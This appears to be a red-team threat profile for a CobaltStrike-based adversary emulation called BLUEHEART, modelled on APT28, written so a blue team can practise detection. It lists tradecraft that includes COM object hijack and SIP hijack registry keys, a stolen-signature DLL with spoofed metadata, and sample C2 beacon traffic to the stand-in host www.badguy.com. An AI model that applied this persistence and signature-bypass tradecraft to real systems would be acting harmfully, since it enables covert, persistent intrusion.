Threat Profile (BLUEHEART)
This example can be used as a reference and would generate as part of threat decomposition and threat profile design using MITRE ATT&CK.
Description
BLUEHEART was inspired on APT28 malware using CobaltStrike malleable C2 profiles, custom metadata, and TTPs.
Goal and Intent
Emulate TTPs of a realistic adversary to exist on a target network and provide a blue team the opportunity to exercise defensive TTPs.
Key IOCs
- User level C2 Agent
- Custom CobaltStrike Malleable C2 profile to mimic CHOPSTICK IOCs
- Persistence: COM Object Hijacking
- File:
C:\Users\Public\Libraries\apphelp.dll - HTTP Traffic to www.badguy.com
- Beacons every 60 seconds - 30% jitter User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
- Modified Date/Time Stamp (Using MetaTwin)
- Custom Binary metadata using valid Microsoft signature
- Modified SubjectInterfacePackage (SIP) for Signature Verification Bypass
Disk Indicators
C:\Users\Public\Libraries\apphelp.dll
Metadata
File: C:\windows\system32\apphelp.dll
InternalName: Apphelp
OriginalFilename: Apphelp
FileVersion: 10.0.10586.0(rs1_release.151029-
1700)
FileDescription:ApplicationCompatibility Client Library
Product: Microsoft® Windows® Operating System
ProductVersion: 10.0.10586.0
Debug: False
Patched: False
PreRelease: False
PrivateBuild: False
SpecialBuild: False
Language: English (United States)
Digital Signature: Stolen from c: \windows\system32\taskhostw.exe
Time Stamp: 10/30/2015 02:17 AM
File Size: 427960
MD5 Hash: A31B0124152CBB60C68DCFEBC9C4909C
Registry Modifications
COM Object Hijack
Key: HKCU:\Software\Classes\CLSID\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\InProcServer32'
Property: (Default)
Property: ThreadingModel
SIP Hijack
Key: HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
Network Indicators
HTTP Traffic C2 commands through www.badguy.com
Sample HTTP GET Request
GET /index.html HTTP/1.1
Accept-Language: en-US,en;q=0.5
Host: www.badguy.com
Proxy-Connection: Keep-Alive
Cookie: session=sE5QGSAMTumuA/3mNmqe5g==
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
Trident/7.0; rv:11.0) like Gecko
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Server: IIS 5.0
Connection: close
Content-Length: 218
<html><head><meta http-equiv="refresh" content=0
url="http://www.badguy.com"><title>Bad Guy Website</title></html>fylWlO
/d4uBN6b0hPlhUDYRcjdjaifkaukstXQZwO3PZpCzTTR
FTERSAITNWz2xTNndMcZgPg==
Sample HTTP POST Request
POST /contact HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.badguy.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=NzQ4NTU=
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;Trident/7.0; rv:11.0) like Gecko
action=Submit&data=jdagislaga-p0Zw
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/octet-stream
Server: IIS 5.0
Connection: close
Content-Length: 40
yF8u8YkdbbWNGWm5gUgaalgOOSfZDX2lnQl5qZEF
C2 Overview
HTTP Traffic on TCP port 80 connecting to www.badguy.com every 60 seconds.
TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)
POST-exploitation via Cobalt Strike commands. Enumeration and lateral movement via Cobalt Strike and native Windows commands. Privilege escalation limited and determined POST-exploitation.
Exploitation
Nothing specific. Operator deploys during after initial access.
Persistence
User Level persistence where COM Object Handler loads DLL at user logon under taskhostw.exe
$Description = "SystemSoundsService"
$CLSID = '{2DEA658F-54C1-4227-AF9B-260AB5FC3543}'